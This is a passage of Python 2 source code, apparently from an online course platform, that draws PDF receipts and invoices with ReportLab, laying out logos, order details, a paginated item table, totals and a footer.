If the path points to an image file, it loads and returns the Image object, None otherwise.
"""
try:
img = Image.open(img_path)
except IOError, ex:
log.exception('Pdf unable to open the image file: %s', str(ex))
img = None
return img
def draw_logos(self):
"""
Draws logos.
"""
horizontal_padding_from_border = self.margin + 9 * mm
vertical_padding_from_border = 11 * mm
img_y_pos = self.page_height - (
self.margin + vertical_padding_from_border + max(self.cobrand_logo_height, self.brand_logo_height)
)
# Left-Aligned cobrand logo
if self.cobrand_logo_path:
cobrand_img = self.load_image(self.cobrand_logo_path)
if cobrand_img:
img_width = float(cobrand_img.size[0]) / (float(cobrand_img.size[1]) / self.cobrand_logo_height)
self.pdf.drawImage(cobrand_img.filename, horizontal_padding_from_border, img_y_pos, img_width,
self.cobrand_logo_height, mask='auto')
# Right aligned brand logo
if self.logo_path:
logo_img = self.load_image(self.logo_path)
if logo_img:
img_width = float(logo_img.size[0]) / (float(logo_img.size[1]) / self.brand_logo_height)
self.pdf.drawImage(
logo_img.filename,
self.page_width - (horizontal_padding_from_border + img_width),
img_y_pos,
img_width,
self.brand_logo_height,
mask='auto'
)
return img_y_pos - self.min_clearance
def draw_title(self, y_pos):
"""
Draws the title, order/receipt ID and the date.
"""
if self.is_invoice:
title = (_('Invoice'))
id_label = (_('Invoice'))
else:
title = (_('Receipt'))
id_label = (_('Order'))
# Draw Title "RECEIPT" OR "INVOICE"
vertical_padding = 5 * mm
horizontal_padding_from_border = self.margin + 9 * mm
font_size = 21
self.pdf.setFontSize(font_size)
self.pdf.drawString(horizontal_padding_from_border, y_pos - vertical_padding - font_size / 2, title)
y_pos = y_pos - vertical_padding - font_size / 2 - self.min_clearance
horizontal_padding_from_border = self.margin + 11 * mm
font_size = 12
self.pdf.setFontSize(font_size)
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Order/Invoice No.
self.pdf.drawString(horizontal_padding_from_border, y_pos,
_(u'{id_label} # {item_id}').format(id_label=id_label, item_id=self.item_id))
y_pos = y_pos - font_size / 2 - vertical_padding
# Draw Date
self.pdf.drawString(
horizontal_padding_from_border, y_pos, _(u'Date: {date}').format(date=self.date)
)
return y_pos - self.min_clearance
def draw_course_info(self, y_pos):
"""
Draws the main table containing the data items.
"""
course_items_data = [
['', (_('Description')), (_('Quantity')), (_('List Price\nper item')), (_('Discount\nper item')),
(_('Amount')), '']
]
for row_item in self.items_data:
course_items_data.append([
'',
Paragraph(row_item['item_description'], getSampleStyleSheet()['Normal']),
row_item['quantity'],
'{currency}{list_price:.2f}'.format(list_price=row_item['list_price'], currency=self.currency),
'{currency}{discount:.2f}'.format(discount=row_item['discount'], currency=self.currency),
'{currency}{item_total:.2f}'.format(item_total=row_item['item_total'], currency=self.currency),
''
])
padding_width = 7 * mm
desc_col_width = 60 * mm
qty_col_width = 26 * mm
list_price_col_width = 21 * mm
discount_col_width = 21 * mm
amount_col_width = 40 * mm
course_items_table = Table(
course_items_data,
[
padding_width,
desc_col_width,
qty_col_width,
list_price_col_width,
discount_col_width,
amount_col_width,
padding_width
],
splitByRow=1,
repeatRows=1
)
course_items_table.setStyle(TableStyle([
#List Price, Discount, Amount data items
('ALIGN', (3, 1), (5, -1), 'RIGHT'),
# Amount header
('ALIGN', (5, 0), (5, 0), 'RIGHT'),
# Amount column (header + data items)
('RIGHTPADDING', (5, 0), (5, -1), 7 * mm),
# Quantity, List Price, Discount header
('ALIGN', (2, 0), (4, 0), 'CENTER'),
# Description header
('ALIGN', (1, 0), (1, -1), 'LEFT'),
# Quantity data items
('ALIGN', (2, 1), (2, -1), 'CENTER'),
# Lines below the header and at the end of the table.
('LINEBELOW', (0, 0), (-1, 0), 1.00, '#cccccc'),
('LINEBELOW', (0, -1), (-1, -1), 1.00, '#cccccc'),
# Innergrid around the data rows.
('INNERGRID', (1, 1), (-2, -1), 0.50, '#cccccc'),
# Entire table
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TOPPADDING', (0, 0), (-1, -1), 2 * mm),
('BOTTOMPADDING', (0, 0), (-1, -1), 2 * mm),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
]))
rendered_width, rendered_height = course_items_table.wrap(0, 0)
table_left_padding = (self.page_width - rendered_width) / 2
split_tables = course_items_table.split(0, self.first_page_available_height)
if len(split_tables) > 1:
# The entire Table won't fit in the available space and requires splitting.
# Draw the part that can fit, start a new page
# and repeat the process with the rest of the table.
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
while len(split_tables) > 1:
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
self.prepare_new_page()
split_tables = split_tables[1].split(0, self.second_page_available_height)
split_table = split_tables[0]
__, rendered_height = split_table.wrap(0, 0)
split_table.drawOn(self.pdf, table_left_padding, self.second_page_start_y_pos - rendered_height)
else:
# Table will fit without the need for splitting.
course_items_table.drawOn(self.pdf, table_left_padding, y_pos - rendered_height)
if not self.is_on_first_page():
y_pos = self.second_page_start_y_pos
return y_pos - rendered_height - self.min_clearance
def prepare_new_page(self):
"""
Inserts a new page and includes the border and the logos.
"""
self.pdf.insert_page_break()
self.draw_border()
y_pos = self.draw_logos()
return y_pos
def draw_totals(self, y_pos):
"""
Draws the boxes containing the totals and the tax id.
"""
totals_data = [
[(_('Total')), self.total_cost],
[(_('Payment Received')), self.payment_received],
[(_('Balance')), self.balance]
]
if self.is_invoice:
# only print TaxID if we are generating an Invoice
totals_data.append(
['', '{tax_label}: {tax_id}'.format(tax_label=self.tax_label, tax_id=self.tax_id)]
)
heights = 8 * mm
totals_table = Table(totals_data, 40 * mm, heights)
styles = [
# Styling for the totals table.
('ALIGN', (0, 0), (-1, -1), 'RIGHT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
# Styling for the Amounts cells
# NOTE: since we are not printing the TaxID for Credit Card
# based receipts, we need to change the cell range for
# these formatting rules
('RIGHTPADDING', (-1, 0), (-1, 2), 7 * mm),
('GRID', (-1, 0), (-1, 2), 3.0, colors.white),
('BACKGROUND', (-1, 0), (-1, 2), '#EEEEEE'),
]
totals_table.setStyle(TableStyle(styles))
__, rendered_height = totals_table.wrap(0, 0)
left_padding = 97 * mm
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
# if space left on page is smaller than the rendered height, render the table on the next page.
self.prepare_new_page()
totals_table.drawOn(self.pdf, self.margin + left_padding, self.second_page_start_y_pos - rendered_height)
return self.second_page_start_y_pos - rendered_height - self.min_clearance
else:
totals_table.drawOn(self.pdf, self.margin + left_padding, y_pos - rendered_height)
return y_pos - rendered_height - self.min_clearance
def draw_footer(self, y_pos):
"""
Draws the footer.
"""
para_style = getSampleStyleSheet()['Normal']
para_style.fontSize = 8
footer_para = Paragraph(self.footer_text.replace("\n", "<br/>"), para_style)
disclaimer_para = Paragraph(self.disclaimer_text.replace("\n", "<br/>"), para_style)
billing_address_para = Paragraph(self.billing_address_text.replace("\n", "<br/>"), para_style)
footer_data = [
['', footer_para],
[(_('Billing Address')), ''],
['', billing_address_para],
[(_('Disclaimer')), ''],
['', disclaimer_para]
]
footer_style = [
# Styling for the entire footer table.
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
('FONTSIZE', (0, 0), (-1, -1), 9),
('TEXTCOLOR', (0, 0), (-1, -1), '#AAAAAA'),
# Billing Address Header styling
('LEFTPADDING', (0, 1), (0, 1), 5 * mm),
# Disclaimer Header styling
('LEFTPADDING', (0, 3), (0, 3), 5 * mm),
('TOPPADDING', (0, 3), (0, 3), 2 * mm),
# Footer Body styling
# ('BACKGROUND', (1, 0), (1, 0), '#EEEEEE'),
# Billing Address Body styling
('BACKGROUND', (1, 2), (1, 2), '#EEEEEE'),
# Disclaimer Body styling
('BACKGROUND', (1, 4), (1, 4), '#EEEEEE'),
]
if self.is_invoice:
terms_conditions_para = Paragraph(self.terms_conditions_text.replace("\n", "<br/>"), para_style)
footer_data.append([(_('TERMS AND CONDITIONS')), ''])
footer_data.append(['', terms_conditions_para])
# TERMS AND CONDITIONS header styling
footer_style.append(('LEFTPADDING', (0, 5), (0, 5), 5 * mm))
footer_style.append(('TOPPADDING', (0, 5), (0, 5), 2 * mm))
# TERMS AND CONDITIONS body styling
footer_style.append(('BACKGROUND', (1, 6), (1, 6), '#EEEEEE'))
footer_table = Table(footer_data, [5 * mm, 176 * mm])
footer_table.setStyle(TableStyle(footer_style))
__, rendered_height = footer_table.wrap(0, 0)
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
self.prepare_new_page()
footer_table.drawOn(self.pdf, self.margin, self.margin + 5 * mm)
| agpl-3.0 |